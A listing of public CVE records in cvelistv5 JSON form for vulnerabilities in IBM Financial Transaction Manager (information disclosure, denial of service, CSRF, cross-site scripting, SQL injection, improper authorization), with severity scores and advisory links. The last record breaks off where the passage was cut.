Vulnerabilites related to IBM - Financial Transaction Manager
cve-2020-4908
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6371260 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/191113 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:14:59.176Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204908-info-disc (191113)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191113" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2020-12-15T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 returns the product version and release information on the login dialog. This information could be used in further attacks against the system." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 4.6, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/I:N/A:N/C:L/PR:N/S:U/AC:L/AV:N/UI:N/RL:O/RC:C/E:U", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-12-16T20:35:29", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204908-info-disc (191113)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191113" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-12-15T00:00:00", "ID": "CVE-2020-4908", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for SWIFT Services for Multiplatforms 3.2.4 returns the product version and release information on the login dialog. This information could be used in further attacks against the system." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6371260", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6371260 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6371260" }, { "name": "ibm-ftm-cve20204908-info-disc (191113)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/191113" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4908", "datePublished": "2020-12-16T20:35:29.958856Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-17T00:05:32.946Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1391
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/103352 | vdb-entry, x_refsource_BID | |
http://www.ibm.com/support/docview.wss?uid=swg22013247 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/138376 | x_refsource_MISC |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.4 Version: 3.0.4.0 Version: 3.1.0 Version: 3.1.0.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T03:59:38.991Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "103352", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/103352" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013247" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138376" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.4" }, { "status": "affected", "version": "3.0.4.0" }, { "status": "affected", "version": "3.1.0" }, { "status": "affected", "version": "3.1.0.0" } ] } ], "datePublic": "2018-02-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.0.4 and 3.1.0 for ACH Services for Multi-Platform could allow an authenticated user to execute a specially crafted command that could cause a denial of service. IBM X-Force ID: 138376." } ], "problemTypes": [ { "descriptions": [ { "description": "Denial of Service", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-03-13T09:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "name": "103352", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/103352" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013247" }, { "tags": [ "x_refsource_MISC" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138376" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2018-02-19T00:00:00", "ID": "CVE-2018-1391", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.4" }, { "version_value": "3.0.4.0" }, { "version_value": "3.1.0" }, { "version_value": "3.1.0.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.0.4 and 3.1.0 for ACH Services for Multi-Platform could allow an authenticated user to execute a specially crafted command that could cause a denial of service. IBM X-Force ID: 138376." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Denial of Service" } ] } ] }, "references": { "reference_data": [ { "name": "103352", "refsource": "BID", "url": "http://www.securityfocus.com/bid/103352" }, { "name": "http://www.ibm.com/support/docview.wss?uid=swg22013247", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=swg22013247" }, { "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138376", "refsource": "MISC", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138376" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1391", "datePublished": "2018-02-22T19:00:00Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-16T22:14:33.369Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1790
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=ibm10731607 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/148944 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.2 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T04:07:44.437Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731607" }, { "name": "ibm-ftm-cve20181790-csrf (148944)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148944" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.2" } ] } ], "datePublic": "2019-05-08T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.0.2 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 148944." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "LOW", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 3.8, "temporalSeverity": "LOW", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/S:U/PR:N/UI:R/AV:N/I:L/C:N/A:N/AC:L/RL:O/E:U/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Access", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-05-10T14:40:19", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731607" }, { "name": "ibm-ftm-cve20181790-csrf (148944)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148944" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2019-05-08T00:00:00", "ID": "CVE-2018-1790", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.2" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.0.2 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 148944." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "N", "I": "L", "PR": "N", "S": "U", "UI": "R" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Access" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10731607", "refsource": "CONFIRM", "title": "IBM Security Bulletin 731607 (Financial Transaction Manager)", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10731607" }, { "name": "ibm-ftm-cve20181790-csrf (148944)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/148944" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1790", "datePublished": "2019-05-10T14:40:19.903410Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-16T22:02:57.970Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-4744
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/1135173 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/172882 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:40:48.986Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194744-xss (172882)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172882" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0" } ] } ], "datePublic": "2019-12-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 172882." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "CHANGED", "temporalScore": 5.8, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/PR:N/I:L/AC:L/AV:N/UI:R/A:N/C:L/S:C/RC:C/E:H/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Cross-Site Scripting", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-12-20T16:25:27", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194744-xss (172882)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172882" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2019-12-19T00:00:00", "ID": "CVE-2019-4744", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 172882." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "N", "S": "C", "UI": "R" }, "TM": { "E": "H", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Cross-Site Scripting" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/1135173", "refsource": "CONFIRM", "title": "IBM Security Bulletin 1135173 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/1135173" }, { "name": "ibm-ftm-cve20194744-xss (172882)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172882" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2019-4744", "datePublished": "2019-12-20T16:25:27.280612Z", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-09-17T01:51:50.244Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1871
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=ibm10743123 | x_refsource_CONFIRM | |
http://www.securityfocus.com/bid/106149 | vdb-entry, x_refsource_BID | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/151329 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.2 Version: 3.0.5 Version: 3.0.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T04:14:38.558Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10743123" }, { "name": "106149", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/106149" }, { "name": "ibm-ftm-cve20181871-xss(151329)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/151329" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.2" }, { "status": "affected", "version": "3.0.5" }, { "status": "affected", "version": "3.0.0" } ] } ], "datePublic": "2018-12-04T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.0.0, 3.0.2, and 3.0.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 151329." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "CHANGED", "temporalScore": 5.2, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/A:N/AC:L/AV:N/C:L/I:L/PR:L/S:C/UI:R/E:H/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Cross-Site Scripting", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-12-11T10:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10743123" }, { "name": "106149", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/106149" }, { "name": "ibm-ftm-cve20181871-xss(151329)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/151329" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2018-12-04T00:00:00", "ID": "CVE-2018-1871", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.2" }, { "version_value": "3.0.5" }, { "version_value": "3.0.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.0.0, 3.0.2, and 3.0.5 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 151329." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "L", "S": "C", "UI": "R" }, "TM": { "E": "H", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Cross-Site Scripting" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10743123", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10743123" }, { "name": "106149", "refsource": "BID", "url": "http://www.securityfocus.com/bid/106149" }, { "name": "ibm-ftm-cve20181871-xss(151329)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/151329" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1871", "datePublished": "2018-12-06T14:00:00Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-16T17:38:49.342Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1819
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=ibm10732361 | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=ibm10732357 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/150023 | vdb-entry, x_refsource_XF | |
http://www.ibm.com/support/docview.wss?uid=ibm10732367 | x_refsource_CONFIRM |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.2 Version: 3.0.4 Version: 3.0.6 Version: 3.2.0 Version: 3.2.0.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T04:14:38.382Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732361" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732357" }, { "name": "ibm-ftm-cve20181819-sql-injection(150023)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/150023" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732367" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.2" }, { "status": "affected", "version": "3.0.4" }, { "status": "affected", "version": "3.0.6" }, { "status": "affected", "version": "3.2.0" }, { "status": "affected", "version": "3.2.0.0" } ] } ], "datePublic": "2018-10-02T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.0.2, 3.0.4, 3.0.6, and 3.2.0 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-force ID: 150023." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "LOW", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.5, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/A:L/AC:L/AV:N/C:L/I:L/PR:L/S:U/UI:N/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Data Manipulation", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-04T14:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732361" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732357" }, { "name": "ibm-ftm-cve20181819-sql-injection(150023)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/150023" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732367" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2018-10-02T00:00:00", "ID": "CVE-2018-1819", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.2" }, { "version_value": "3.0.4" }, { "version_value": "3.0.6" }, { "version_value": "3.2.0" }, { "version_value": "3.2.0.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.0.2, 3.0.4, 3.0.6, and 3.2.0 is vulnerable to SQL injection. A remote attacker could send specially-crafted SQL statements, which could allow the attacker to view, add, modify or delete information in the back-end database. IBM X-force ID: 150023." } ] }, "impact": { "cvssv3": { "BM": { "A": "L", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "L", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Data Manipulation" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10732361", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732361" }, { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10732357", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732357" }, { "name": "ibm-ftm-cve20181819-sql-injection(150023)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/150023" }, { "name": "http://www.ibm.com/support/docview.wss?uid=ibm10732367", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=ibm10732367" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1819", "datePublished": "2018-10-04T15:00:00Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-16T23:01:26.169Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-43872
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6848881 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/239708 | vdb-entry |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T13:40:06.872Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6848881" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/239708" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "\n\n\u003cspan style=\"background-color: rgb(204, 217, 226);\"\u003eIBM Financial Transaction Manager 3.2.4 authorization checks are done incorrectly for some HTTP requests which allows getting unauthorized technical information (e.g. event log entries) about the FTM SWIFT system. IBM X-Force ID: 239708.\u003c/span\u003e\n\n" } ], "value": "\nIBM Financial Transaction Manager 3.2.4 authorization checks are done incorrectly for some HTTP requests which allows getting unauthorized technical information (e.g. event log entries) about the FTM SWIFT system. IBM X-Force ID: 239708.\n\n" } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "description": "285 Improper Authorization", "lang": "en" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-20T18:35:34.432Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6848881" }, { "tags": [ "vdb-entry" ], "url": 